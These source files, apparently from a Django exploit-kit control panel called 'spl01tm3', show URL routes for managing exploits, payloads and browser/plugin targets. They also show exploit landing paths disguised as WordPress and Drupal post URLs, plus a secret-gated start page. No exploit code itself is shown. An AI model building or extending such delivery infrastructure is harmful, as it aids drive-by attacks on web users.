spl01tm3/controller/urls.py
from django.conf.urls import patterns, url

from controller import views

urlpatterns = patterns('',
    url(r'^check/$', views.check, name='check'),
    url(r'^stop/$', views.stop, name='stop'),
    url(r'^panel/$', views.panel, name='panel'),
    url(r'^$', views.index, name='index'),
)

spl01tm3/controlpanel/urls.py
from django.conf.urls import patterns, url

from controlpanel import views

urlpatterns = patterns('',
    url(r'^set_timezone/$', views.set_timezone, name='set_timezone'),
    url(r'^threads/$', views.threads_list, name="threads"),
    url(r'^thread/(?:(?P<thread_id>\d+)/)?$', views.thread, name="thread"),
    url(r'^rule/(?:(?P<rule_id>\d+)/)?$', views.rule, name="rule"),
    url(r'^exploits/$', views.exploits_list, name="exploits"),
    url(r'^exploit/(?:(?P<exploit_id>\d+)/)?$', views.exploit, name="exploit"),
    url(r'^target/os/(?:(?P<target_os_id>\d+)/)?$', views.target_os, name="target_os"),
    url(r'^target/browser/(?:(?P<target_browser_id>\d+)/)?$', views.target_browser, name="target_browser"),
    url(r'^target/plugin/(?:(?P<target_plugin_id>\d+)/)?$', views.target_plugin, name="target_plugin"),
    url(r'^payloads/$', views.payloads_list, name="payloads"),
    url(r'^payload/(?:(?P<payload_id>\d+)/)?$', views.payload, name="payload"),
    url(r'^security/$', views.security, name="security"),
    url(r'^notifications/smtp_configuration/(?:(?P<conf_id>\d+)/)?$', views.smtp_configuration, name="smtpconf"),
    url(r'^notifications/sms_configuration/(?:(?P<conf_id>\d+)/)?$', views.sms_configuration, name="smsconf"),
    url(r'^notifications/recipient/(?:(?P<recipient_id>\d+)/)?$', views.notification_recipient, name="recipient"),
    url(r'^notifications/$', views.notifications, name="notifications"),
    url(r'^details/logs/$', views.explore_logs, name="explore_logs"),
    url(r'^details/$', views.details, name="details"),
    url(r'^icons/browser/(?P<family>[^/]+)(?:/(?P<version>[^/]+))?/$', views.browser_icon, name="browser_icon"),
    url(r'^icons/os/(?P<family>[^/]+)(?:/(?P<version>[^/]+))?/$', views.os_icon, name="os_icon"),
    # Stats tab (default)
    url(r'^$', views.stats, name='stats'),
)

spl01tm3/spl01tm3/urls.py
from django.conf.urls import patterns, include, url

from django.contrib import admin
admin.autodiscover()

urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'spl01tm3.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),

    url(r'^admin/', include(admin.site.urls)),
    url(r'^login/$', 'django.contrib.auth.views.login', name="login"),
    url(r'^logout/$', 'django.contrib.auth.views.logout_then_login', name="logout"),

    url(r'^panel/', include('controlpanel.urls', namespace="controlpanel", app_name="controlpanel")),
    url(r'^controller/', include('controller.urls', namespace="controller", app_name="controller")),

    url(r'^\d{4}/\d{2}/\d{2}/[a-zA-Z0-9\-_]*/.+$', 'landingpage.views.payload', name="payload_wordpress"),
    url(r'^(?:drupal/)?node/\d+/.+$', 'landingpage.views.payload', name="payload_drupal"),

    url(r'^\d{4}/\d{2}/\d{2}/[a-zA-Z0-9\-_]*/$', 'landingpage.views.exploit', name="exploit_wordpress"),
    url(r'^(?:drupal/)?node/\d+/$', 'landingpage.views.exploit', name="exploit_drupal"),
    #url(r'^modules.php$', 'landingpage.views.exploit', name="exploit_phpnuke"),

    url(r'^(\d+)$', 'landingpage.views.landingpage', name="landingpage"),
)

spl01tm3/controller/models.py
from django.db import models

# Create your models here.

spl01tm3/controller/forms.py
from django import forms

class StartControlPanelForm(forms.Form):
    secret  = forms.CharField(required=True, label="Secret")

spl01tm3/controller/views.py
from django.shortcuts import render, redirect
from controller.forms import *
from controller.utils import *

def index(request):
    # If the panel is already running, redirect to it
    if check_ready():
        return redirect('controller:panel')

    context = {
        'form': StartControlPanelForm(request.POST or None)
    }
    if request.method == 'POST':
        if context['form'].is_valid():
            if start_panel(context['form'].cleaned_data['secret']):
                return render(request, 'controller/wait.html', context)
            else:
                context['form'].add_error('secret', 'Unable to start the panel, please check your secret')

    return render(request, 'controller/login.html', context)

def check(request):
    return render(request, 'controller/check.html', {'ready': check_ready()})

def panel(request, errors=[]):
    # If the panel is not ready, redirect to the index page (insert secret)
    if not check_ready():
        return redirect('controller:index')

    return render(request, 'controller/main.html', {'errors': errors})

def stop(request):
    if stop_panel():
        return redirect('controller:index')
    else:
        return redirect('controller:panel', errors=['Unable to stop the panel, please try again'])

spl01tm3/templates/controller/check.html
{
    "ready": {{ ready|lower }}
}

spl01tm3/templates/controller/login.html
{% extends "base.html" %}
{% block title %}Enter Secret{% endblock %}
{% block content %}
    <form name="filter" method="post">
        {% csrf_token %}
        <div class="row">
            <div class="col-md-4 col-md-offset-4">
                <div class="panel panel-default">
                     <div class="panel-heading">
                        <h3 class="panel-title">Enter secret</h3>
                    </div>
                    <div class="panel-body">
                        <div class="row">
                            <div class="col-md-12 form-group">
                                {% for error in form.secret.errors %}
                                <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                                {% endfor %}
                                {{ form.secret.label_tag }}
                                <textarea class="form-control" rows="3" id="{{ form.secret.id_for_label }}" name="{{ form.secret.html_name }}">{{ form.secret.value|default:"" }}</textarea>
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-md-12">
                                <input type="submit" class="btn btn-primary btn-block" value="Go!">
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </form>
{% endblock %}

spl01tm3/templates/controller/main.html
{% extends "base.html" %}
{% block title %}Starting{% endblock %}
{% block content %}
    <div class="row">
        <div class="col-md-4 col-md-offset-4">
            <div class="panel panel-default">
                    <div class="panel-heading">
                    <h3 class="panel-title">Ready</h3>
                </div>
                <div class="panel-body">
                    {% for error in errors %}
                    <div class="alert alert-danger" role="alert">{{ error|escape }}</div>
                    {% endfor %}
                    <a class="btn btn-primary btn-block" href="{% url 'controlpanel:stats' %}" role="button" target="_blank">Open panel</a>
                    <a class="btn btn-danger btn-block" href="{% url 'controller:stop' %}" role="button">Stop panel</a>
                </div>
            </div>
        </div>
    </div>
{% endblock %}

spl01tm3/templates/controller/wait.html
{% extends "base.html" %}
{% block title %}Starting{% endblock %}
{% block content %}
    <div class="row">
        <div class="col-md-4 col-md-offset-4">
            <div class="panel panel-default">
                    <div class="panel-heading">
                    <h3 class="panel-title">Starting...</h3>
                </div>
                <div class="panel-body">
                    <div class="row">
                        <div class="col-md-12">
                            Please wait while starting the panel
                        </div>
                    </div>
                    <div class="row">
                        <div class="col-md-12">
                            <div class="progress">
                                <div class="progress-bar progress-bar-striped active" role="progressbar" aria-valuenow="100" aria-valuemin="0" aria-valuemax="100" style="width: 100%"></div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
{% endblock %}
{% block bottomscripts %}

$(function() {
    interval = setInterval(function(){
    $.getJSON( "{% url 'controller:check' %}", function check( data ) {
        if (data['ready']) {
            clearTimeout(interval);
            $(location).attr('href','{% url 'controller:panel' %}');;
        }
    })}, 1000);
});
{% endblock %}